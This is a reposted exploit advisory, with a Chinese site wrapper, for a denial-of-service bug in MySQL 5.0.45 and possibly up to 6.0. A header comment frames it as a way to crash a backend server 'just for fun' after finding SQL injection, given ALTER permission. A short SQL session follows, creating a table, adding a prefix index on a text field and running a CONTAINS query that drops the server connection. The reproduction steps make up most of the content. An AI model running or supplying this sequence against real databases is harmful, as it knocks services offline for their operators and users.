《Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞》要点:
本文介绍了Mysql必读mysql 5.0.45 (修改)拒绝服务漏洞,希望对您有用。如果有疑问,可以联系我们。
/*
* MySQL <=6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection,but you want to punch backend server
* in the nuts just for fun. Start with the Alter TABLE statement on
* a table and field you know to exist. The first two SQL statements are
* simply to demostrate reproducibility...
*/
<snip>
mysql> Create TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK,0 rows affected
mysql> Select * FROM test Where CONTAINS(foo,''bar'');
Empty set
mysql> Alter TABLE test ADD INDEX (foo(100));
Query OK,0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> Select * FROM test Where CONTAINS(foo,''bar'');
ERROR 2013 : Lost connection to MySQL server during query
</snip>
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。